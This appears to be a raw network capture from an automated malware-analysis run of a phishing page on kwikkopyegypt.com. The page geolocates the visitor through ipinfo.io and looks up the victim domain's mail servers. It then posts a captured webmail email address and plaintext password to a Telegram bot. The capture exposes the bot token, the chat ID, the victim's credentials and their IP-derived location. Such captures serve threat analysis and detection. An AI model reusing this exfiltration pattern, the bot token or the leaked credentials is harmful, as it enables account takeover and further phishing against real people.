                                                                                                    2025-03-10 12:50:48 UTC8194INData Raw: 31 66 66 61 0d 0a 00 00 47 a9 49 44 41 54 78 5e ec d8 5b 6e e3 c0 96 6d d1 db ff 4e d7 fd a9 04 0e 26 8a 87 c1 78 48 b4 3d 06 b0 7e 2c ee b5 43 4e a5 44 eb ff fd 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Data Ascii: 1ffaGIDATx^[nmN&xH=~,CND?
                                                                                                    2025-03-10 12:50:48 UTC5792INData Raw: 31 36 39 38 0d 0a dc 68 66 b5 67 34 4f 75 fe 2a 6f d7 f3 36 a7 74 cf ea be f6 8c e6 a9 ce 5f e5 6d 7a be 66 b7 f6 5f e5 a9 ce 5f 65 56 7b 9e 06 00 e0 e3 7a 43 72 fa c6 a4 7b 9a 51 9d 6b 66 b5 e7 2a a3 3a 77 95 5d da 3b db df f9 ab 8c ea dc 55 9e ea fc 6c cf 3f ed b9 ca a8 ce 5d e5 db 7a 9e ab 3c d5 f9 dd 3d b3 7d ff b4 e7 2a a3 3a 37 9a 59 ed 19 cd 53 9d bf ca db f5 bc cd 29 dd b3 ba af 3d a3 79 aa f3 57 79 9b 9e af d9 ad fd 57 79 aa f3 57 99 d5 9e a7 01 00 f8 b8 de 90 9c be 31 e9 9e 66 54 e7 9a 59 ed 69 66 b5 a7 79 ab 9e b3 19 d5 b9 e6 2d 7a ae 66 56 7b 9a 6f eb 79 9a 6f eb 79 9a 59 ed 69 56 b5 ef 2a b3 da 73 97 55 ed 6b de ae e7 6d 4e e9 9e d5 7d ed b9 cb aa f6 35 6f d3 f3 35 bb b5 bf 59 d5 be 66 56 7b ee 02 00 f0 75 bd 41 39 7d a3 d2 3d cd a8 ce 35 b3
                                                                                                    Data Ascii: 1698hfg4Ou*o6t_mzf__eV{zCr{Qkf*:w];Ul?]z<=}*:7YS)=yWyWyW1fTYify-zfV{oyoyYiV*sUkmN}5o5YfV{uA9}=5
                                                                                                    2025-03-10 12:50:48 UTC4407INData Raw: 31 31 32 66 0d 0a 66 75 ae 39 ad fb be b5 f7 93 de 33 ca 2e ed 7d da df b9 e6 96 de d1 dc d2 3b 9a d3 ba af 99 d5 b9 e6 94 ee 79 bb af 3d cd 29 dd b3 6b 5f fb 76 f5 02 00 c0 92 3e 4c 9b dd da 7f 6a cf 53 bd a7 39 ad fb 9e ee ed 5c b3 5b fb 57 f7 74 be 99 d5 b9 e6 b4 ee fb d6 de 4f 7a 4f b3 5b fb 9f ee e9 5c 73 4b ef 68 6e e9 1d cd 69 dd d7 cc ea 5c 73 4a f7 bc dd d7 9e e6 94 ee d9 b5 af 7d bb 7a 01 00 60 49 1f a6 cd 6e ed 3f b5 e7 a9 de d3 9c d6 7d 4f f7 76 ae d9 ad fd ab 7b 3a df cc ea 5c 73 5a f7 7d 6b ef 27 bd a7 d9 ad fd 4f f7 74 ae b9 a5 77 34 b7 f4 8e e6 b4 ee 6b 66 75 ae 39 a5 7b de ee 6b 4f 73 4a f7 ec da d7 be 5d bd 00 00 b0 a4 0f d3 66 b7 f6 9f da f3 54 ef 69 4e e9 9e 66 56 e7 9a dd da bf ba a7 f3 cd ac ce 35 a7 74 4f 73 5b ef 69 76 6b ff ea 9e
                                                                                                    Data Ascii: 112ffu93.};y=)k_v>LjS9\[WtOzO[\sKhni\sJ}z`In?}Ov{:\sZ}k'Otw4kfu9{kOsJ]fTiNfV5tOs[ivk
                                                                                                    2025-03-10 12:50:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.2453999142.250.186.1324436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:50:51 UTC671OUTGET /s2/favicons?domain=southwark.anglican.org HTTP/1.1
                                                                                                    Host: www.google.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    Origin: https://kwikkopyegypt.com
                                                                                                    X-Client-Data: CIS2yQEIpbbJAQipncoBCIb0ygEIlKHLAQiKo8sBCIWgzQEI+dfOARj0yc0B
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://kwikkopyegypt.com/
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:50:51 UTC494INHTTP/1.1 301 Moved Permanently
                                                                                                    Location: https://t1.gstatic.com/faviconV2?client=SOCIAL&type=FAVICON&fallback_opts=TYPE,SIZE,URL&url=http://southwark.anglican.org&size=16
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Date: Mon, 10 Mar 2025 12:50:51 GMT
                                                                                                    Expires: Mon, 10 Mar 2025 13:20:51 GMT
                                                                                                    Cache-Control: public, max-age=1800
                                                                                                    Server: sffe
                                                                                                    Content-Length: 342
                                                                                                    X-XSS-Protection: 0
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close
                                                                                                    2025-03-10 12:50:51 UTC342INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 74 31 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 56 32 3f 63 6c 69 65 6e 74 3d 53 4f 43 49 41 4c 26 61 6d 70 3b 74 79 70 65 3d 46 41 56 49 43 4f 4e 26 61 6d 70 3b 66 61 6c 6c 62 61 63 6b 5f 6f 70 74 73 3d 54 59 50 45 2c
                                                                                                    Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://t1.gstatic.com/faviconV2?client=SOCIAL&amp;type=FAVICON&amp;fallback_opts=TYPE,


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    9192.168.2.245400034.117.59.814436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:50:59 UTC552OUTGET /json HTTP/1.1
                                                                                                    Host: ipinfo.io
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    Accept: */*
                                                                                                    Origin: https://kwikkopyegypt.com
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://kwikkopyegypt.com/
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:50:59 UTC345INHTTP/1.1 200 OK
                                                                                                    access-control-allow-origin: *
                                                                                                    Content-Length: 317
                                                                                                    content-type: application/json; charset=utf-8
                                                                                                    date: Mon, 10 Mar 2025 12:50:59 GMT
                                                                                                    x-content-type-options: nosniff
                                                                                                    via: 1.1 google
                                                                                                    strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close
                                                                                                    2025-03-10 12:50:59 UTC317INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 36 37 2e 38 32 2e 31 31 36 2e 31 31 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 6f 6f 6c 2d 34 33 35 32 37 34 37 37 2e 64 79 6e 2e 6f 70 74 6f 6e 6c 69 6e 65 2e 6e 65 74 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 45 6c 69 7a 61 62 65 74 68 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 4a 65 72 73 65 79 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 36 36 34 30 2c 2d 37 34 2e 32 31 30 37 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 36 31 32 38 20 43 61 62 6c 65 76 69 73 69 6f 6e 20 53 79 73 74 65 6d 73 20 43 6f 72 70 2e 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 30 37 32 30 37 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d
                                                                                                    Data Ascii: { "ip": "67.82.116.119", "hostname": "ool-43527477.dyn.optonline.net", "city": "Elizabeth", "region": "New Jersey", "country": "US", "loc": "40.6640,-74.2107", "org": "AS6128 Cablevision Systems Corp.", "postal": "07207", "timezone": "Am


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    10192.168.2.245400334.117.59.814436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:51:01 UTC343OUTGET /json HTTP/1.1
                                                                                                    Host: ipinfo.io
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:51:01 UTC345INHTTP/1.1 200 OK
                                                                                                    access-control-allow-origin: *
                                                                                                    Content-Length: 317
                                                                                                    content-type: application/json; charset=utf-8
                                                                                                    date: Mon, 10 Mar 2025 12:51:01 GMT
                                                                                                    x-content-type-options: nosniff
                                                                                                    via: 1.1 google
                                                                                                    strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close
                                                                                                    2025-03-10 12:51:01 UTC317INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 36 37 2e 38 32 2e 31 31 36 2e 31 31 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 6f 6f 6c 2d 34 33 35 32 37 34 37 37 2e 64 79 6e 2e 6f 70 74 6f 6e 6c 69 6e 65 2e 6e 65 74 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 45 6c 69 7a 61 62 65 74 68 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 4a 65 72 73 65 79 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 36 36 34 30 2c 2d 37 34 2e 32 31 30 37 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 36 31 32 38 20 43 61 62 6c 65 76 69 73 69 6f 6e 20 53 79 73 74 65 6d 73 20 43 6f 72 70 2e 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 30 37 32 30 37 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d
                                                                                                    Data Ascii: { "ip": "67.82.116.119", "hostname": "ool-43527477.dyn.optonline.net", "city": "Elizabeth", "region": "New Jersey", "country": "US", "loc": "40.6640,-74.2107", "org": "AS6128 Cablevision Systems Corp.", "postal": "07207", "timezone": "Am


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    11192.168.2.24540028.8.4.44436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:51:01 UTC592OUTGET /resolve?name=southwark.anglican.org&type=MX HTTP/1.1
                                                                                                    Host: dns.google
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    Accept: */*
                                                                                                    Origin: https://kwikkopyegypt.com
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://kwikkopyegypt.com/
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:51:01 UTC547INHTTP/1.1 200 OK
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Date: Mon, 10 Mar 2025 12:51:01 GMT
                                                                                                    Expires: Mon, 10 Mar 2025 12:51:01 GMT
                                                                                                    Cache-Control: private, max-age=600
                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                    Server: HTTP server (unknown)
                                                                                                    X-XSS-Protection: 0
                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Accept-Ranges: none
                                                                                                    Vary: Accept-Encoding
                                                                                                    Connection: close
                                                                                                    Transfer-Encoding: chunked
                                                                                                    2025-03-10 12:51:01 UTC380INData Raw: 31 37 35 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 6f 75 74 68 77 61 72 6b 2e 61 6e 67 6c 69 63 61 6e 2e 6f 72 67 2e 22 2c 22 74 79 70 65 22 3a 31 35 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 6f 75 74 68 77 61 72 6b 2e 61 6e 67 6c 69 63 61 6e 2e 6f 72 67 2e 22 2c 22 74 79 70 65 22 3a 31 35 2c 22 54 54 4c 22 3a 36 30 30 2c 22 64 61 74 61 22 3a 22 32 30 20 65 75 2d 73 6d 74 70 2d 69 6e 62 6f 75 6e 64 2d 32 2e 6d 69 6d 65 63 61 73 74 2e 63 6f 6d 2e 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 6f 75 74 68 77 61 72 6b
                                                                                                    Data Ascii: 175{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"southwark.anglican.org.","type":15}],"Answer":[{"name":"southwark.anglican.org.","type":15,"TTL":600,"data":"20 eu-smtp-inbound-2.mimecast.com."},{"name":"southwark
                                                                                                    2025-03-10 12:51:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    12192.168.2.24540058.8.8.84436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:51:03 UTC383OUTGET /resolve?name=southwark.anglican.org&type=MX HTTP/1.1
                                                                                                    Host: dns.google
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:51:04 UTC547INHTTP/1.1 200 OK
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Date: Mon, 10 Mar 2025 12:51:04 GMT
                                                                                                    Expires: Mon, 10 Mar 2025 12:51:04 GMT
                                                                                                    Cache-Control: private, max-age=597
                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                    Server: HTTP server (unknown)
                                                                                                    X-XSS-Protection: 0
                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Accept-Ranges: none
                                                                                                    Vary: Accept-Encoding
                                                                                                    Connection: close
                                                                                                    Transfer-Encoding: chunked
                                                                                                    2025-03-10 12:51:04 UTC339INData Raw: 31 34 63 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 6f 75 74 68 77 61 72 6b 2e 61 6e 67 6c 69 63 61 6e 2e 6f 72 67 2e 22 2c 22 74 79 70 65 22 3a 31 35 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 6f 75 74 68 77 61 72 6b 2e 61 6e 67 6c 69 63 61 6e 2e 6f 72 67 2e 22 2c 22 74 79 70 65 22 3a 31 35 2c 22 54 54 4c 22 3a 35 39 37 2c 22 64 61 74 61 22 3a 22 32 30 20 65 75 2d 73 6d 74 70 2d 69 6e 62 6f 75 6e 64 2d 32 2e 6d 69 6d 65 63 61 73 74 2e 63 6f 6d 2e 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 6f 75 74 68 77 61 72 6b
                                                                                                    Data Ascii: 14c{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"southwark.anglican.org.","type":15}],"Answer":[{"name":"southwark.anglican.org.","type":15,"TTL":597,"data":"20 eu-smtp-inbound-2.mimecast.com."},{"name":"southwark
                                                                                                    2025-03-10 12:51:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    13192.168.2.2454004149.154.167.2204436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:51:03 UTC745OUTPOST /bot7288767743:AAGRVsMLRSfD1NGxN7FxB_HXGEFvLGfPn9w/sendMessage HTTP/1.1
                                                                                                    Host: api.telegram.org
                                                                                                    Connection: keep-alive
                                                                                                    Content-Length: 714
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    Accept: application/json, text/javascript, */*; q=0.01
                                                                                                    sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    Origin: https://kwikkopyegypt.com
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://kwikkopyegypt.com/
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:51:03 UTC714OUTData Raw: 63 68 61 74 5f 69 64 3d 37 31 37 37 39 38 35 30 38 34 26 74 65 78 74 3d 2d 2d 2d 2d 2d 2d 2d 2d 25 32 42 2b 47 65 6e 65 72 61 6c 2b 57 65 62 6d 61 69 6c 2b 52 65 5a 75 6c 54 2b 45 6c 69 7a 61 62 65 74 68 2b 4e 65 77 2b 4a 65 72 73 65 79 25 32 43 2b 55 53 2b 25 32 42 2d 2d 2d 2d 2d 2d 2d 2d 6e 45 6d 61 69 6c 2b 25 33 41 2b 6c 75 6b 65 2e 74 61 74 61 6d 25 34 30 73 6f 75 74 68 77 61 72 6b 2e 61 6e 67 6c 69 63 61 6e 2e 6f 72 67 25 30 41 50 61 73 73 77 6f 72 64 2b 25 33 41 2b 34 4c 4d 71 73 62 4f 30 25 32 43 48 56 25 30 41 43 68 65 63 6b 65 72 25 33 41 2b 6c 75 6b 65 2e 74 61 74 61 6d 25 34 30 73 6f 75 74 68 77 61 72 6b 2e 61 6e 67 6c 69 63 61 6e 2e 6f 72 67 25 33 41 34 4c 4d 71 73 62 4f 30 25 32 43 48 56 25 30 41 42 72 6f 77 73 65 72 2b 25 33 41 2b 35 2e 30
                                                                                                    Data Ascii: chat_id=7177985084&text=--------%2B+General+Webmail+ReZulT+Elizabeth+New+Jersey%2C+US+%2B--------nEmail+%3A+luke.tatam%40southwark.anglican.org%0APassword+%3A+4LMqsbO0%2CHV%0AChecker%3A+luke.tatam%40southwark.anglican.org%3A4LMqsbO0%2CHV%0ABrowser+%3A+5.0
                                                                                                    2025-03-10 12:51:04 UTC389INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Mon, 10 Mar 2025 12:51:04 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 1097
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                    2025-03-10 12:51:04 UTC1097INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 38 38 37 36 37 37 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6d 61 74 74 68 61 69 67 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 61 74 74 68 61 69 67 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 31 37 37 39 38 35 30 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 69 64 6e 65 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 34 31 36 31 31 30 36 34 2c 22 74 65 78 74 22 3a 22 2d 2d 2d 2d 2d 2d 2d 2d 2b 20 47 65 6e 65 72 61 6c 20 57 65 62 6d 61 69 6c 20 52 65 5a 75 6c 54 20 45 6c 69 7a
                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":28,"from":{"id":7288767743,"is_bot":true,"first_name":"matthaigbot","username":"matthaigbot"},"chat":{"id":7177985084,"first_name":"Sidney","type":"private"},"date":1741611064,"text":"--------+ General Webmail ReZulT Eliz


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    14192.168.2.2454006149.154.167.2204436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:51:06 UTC407OUTGET /bot7288767743:AAGRVsMLRSfD1NGxN7FxB_HXGEFvLGfPn9w/sendMessage HTTP/1.1
                                                                                                    Host: api.telegram.org
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:51:07 UTC346INHTTP/1.1 400 Bad Request
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Mon, 10 Mar 2025 12:51:07 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 80
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                    2025-03-10 12:51:07 UTC80INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d
                                                                                                    Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    15192.168.2.245400734.117.59.814436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:51:20 UTC552OUTGET /json HTTP/1.1
                                                                                                    Host: ipinfo.io
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    Accept: */*
                                                                                                    Origin: https://kwikkopyegypt.com
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://kwikkopyegypt.com/
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:51:21 UTC345INHTTP/1.1 200 OK
                                                                                                    access-control-allow-origin: *
                                                                                                    Content-Length: 317
                                                                                                    content-type: application/json; charset=utf-8
                                                                                                    date: Mon, 10 Mar 2025 12:51:21 GMT
                                                                                                    x-content-type-options: nosniff
                                                                                                    via: 1.1 google
                                                                                                    strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close
